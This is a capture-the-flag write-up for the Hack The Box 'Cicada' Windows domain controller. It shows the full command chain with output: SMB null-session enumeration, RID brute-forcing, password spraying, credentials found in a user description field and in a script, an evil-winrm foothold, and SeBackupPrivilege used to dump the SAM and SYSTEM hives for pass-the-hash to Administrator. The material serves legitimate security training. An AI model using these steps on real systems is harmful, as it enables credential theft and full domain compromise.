Cicada - CSPSec

![[Cicada.png]] # Reconnaissance Started off with an Nmap scan and specified the following options: - `-sC` to use default scripts - `-sV` to gather service/version information - `-oA` to save the output to a file - `-p-` to scan all TCP ports The scan results suggest that the host is Windows-based. It is running SMB on TCP ports 139 and 445. It also runs LDAP/LDAPS and Kerberos on TCP ports 389/636 and 88, respectively. These services are usually seen on domain controllers. Finally, WinRM is also running on TCP port 5985. ```bash ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ sudo nmap -sC -sV -oA nmap/full.tcp -p- 10.129.82.46 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 14:01 CST Nmap scan report for 10.129.82.46 Host is up (0.0080s latency). Not shown: 65524 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-23 03:03:41Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: 6h59m59s | smb2-time: | date: 2024-11-23T03:04:24 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 231.74 seconds ``` # Initial Access ## Abusing Null Sessions and Poor Password Policies To gather more information about the system, I ran the following command. The command results revealed that the system supports null sessions, but RPC queries for users/groups were denied. Considering that, it was time to pivot to shares and enumerate those. A couple of non-standard shares looked promising, but only one could have the contents of its directory listed. That share had a fascinating text document. ```bash ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ enum4linux -A 10.129.82.46 ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ smbclient --no-pass -L 10.129.82.46 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share DEV Disk HR Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.129.82.46 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ smbclient --no-pass //10.129.82.46/DEV Try "help" to get a list of possible commands. smb: \> dir NT_STATUS_ACCESS_DENIED listing \* smb: \> exit ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ smbclient --no-pass //10.129.82.46/HR Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Mar 14 07:29:09 2024 .. D 0 Thu Mar 14 07:21:29 2024 Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024 4168447 blocks of size 4096. 430240 blocks available smb: \> get "Notice from HR.txt" getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (35.3 KiloBytes/sec) (average 35.3 KiloBytes/sec) smb: \> exit ``` The text document is related to the company's onboarding process and contains directions for employees accessing their accounts using a default password. And like any good company with proper security protocols, it directs its employees to change their passwords to something unique after logging in for the first time. Indeed, all the employees followed the directions, so a password-spraying attack would not work or will it? I generated a list of usernames by performing RID brute-forcing via `netexec` and selected user SIDs only. With a password and a list of usernames, it was time to spray and pray. Just like that, I discovered valid user credentials. I did not know what type of access `michael.wrightson` had. Because of that, it is good practice to go back to the enumeration phase and see what new information can be gathered from the environment. Fortunately, `michael.wrightson` can query users/groups via RPC. In the description field for `david.orelious` is his password, just in case he forgets it. I enumerated the system again with `david.orelious`'s credentials. It turns he has access to the DEV share. On that share was a PowerShell script with hard-coded credentials for `emily.oscars`. ```bash ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser" SMB 10.129.82.46 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 501: CICADA\Guest (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser) SMB 10.129.82.46 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser) ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser" \ > | cut -d \'\' -f2 | cut -d '(' -f1 Administrator Guest krbtgt CICADA-DC$ john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ netexec smb 10.129.82.46 -d CICADA -p pw.txt -u users.txt | egrep '\+' | cut -d ":" -f1 SMB 10.129.82.46 445 CICADA-DC [+] CICADA\michael.wrightson ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ enum4linux -A -u michael.wrightson -p $(cat pw.txt) 10.129.82.46 ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ enum4linux -A -u david.orelious -p $(cat pw.txt) 10.129.82.46 ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ smbclient -U CICADA/david.orelious%"$(cat pw.txt)" //10.129.82.46/Dev Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Mar 14 07:31:39 2024 .. D 0 Thu Mar 14 07:21:29 2024 Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024 4168447 blocks of size 4096. 427257 blocks available smb: \> get Backup_script.ps1 getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (17.3 KiloBytes/sec) (average 17.3 KiloBytes/sec) smb: \> exit ``` Based on the backup script, I assumed `emily.oscars` is a system administrator. Sometimes, system administrators need to access remote hosts. There are many tools out there that provide this type of functionality. In a Windows environment, however, there is a native tool that allows system administrators to access and control devices remotely. That tool is known as PowerShell remoting, which relies on WinRM. During my initial enumeration of the target system, it showed that the WinRM service was running on TCP port 5985. Utilizing the credentials from the PowerShell script, it was possible to get code execution on the target. ```bash ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ evil-winrm -i 10.129.82.46 -u emily.oscars -p $(cat pw.txt) Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname CICADA-DC ``` # Privilege Escalation ## Abusing Group Membership Permissions With a foothold established on the target system, I started to gain some situational awareness. After doing so, one might notice that the user `emily.oscars` is part of a unique group - `BUILTIN\Backup Operators`. ```powershell *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all USER INFORMATION ---------------- User Name SID =================== ============================================= cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group ...SNIP... PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled ...SNIP... ``` Being a member of the `BUILTIN\Backup Operators` group and enabling the `SeBackupPrivilege` allows a user to create a backup of ANY file on the host. With that in mind, it is possible to back up the SAM and SYSTEM hives and extract credentials for local system accounts. ```powershell *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam The operation completed successfully. *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system The operation completed successfully. *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir Directory: C:\Users\emily.oscars.CICADA\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 11/23/2024 2:21 AM 49152 sam -a---- 11/23/2024 2:21 AM 18558976 system *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam Info: Download successful! *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system Info: Download successful! ``` With the local `Administrator`'s hash in hand, it is possible to use WinRM and elevate privileges. ```bash ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ ls -latr sam system -rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 49152 Nov 22 21:21 sam -rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 18558976 Nov 22 21:22 system ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ pypykatz registry --sam sam system WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work ============== SYSTEM hive secrets ============== CurrentControlSet: ControlSet001 Boot Key: 3c2b033757a49110a9ee680b46e8d620 ============== SAM hive secrets ============== HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010 Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee::: ┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada] └──╼ [★]$ evil-winrm -i 10.129.82.46 -u administrator -H $(cat admin_hash.txt) Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami cicada\administrator ``` # References - [Windows Server Over and Port Requirements](https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/service-overview-and-network-port-requirements) - [Backup Operator Privilege Escalation](https://www.bordergate.co.uk/backup-operator-privilege-escalation/)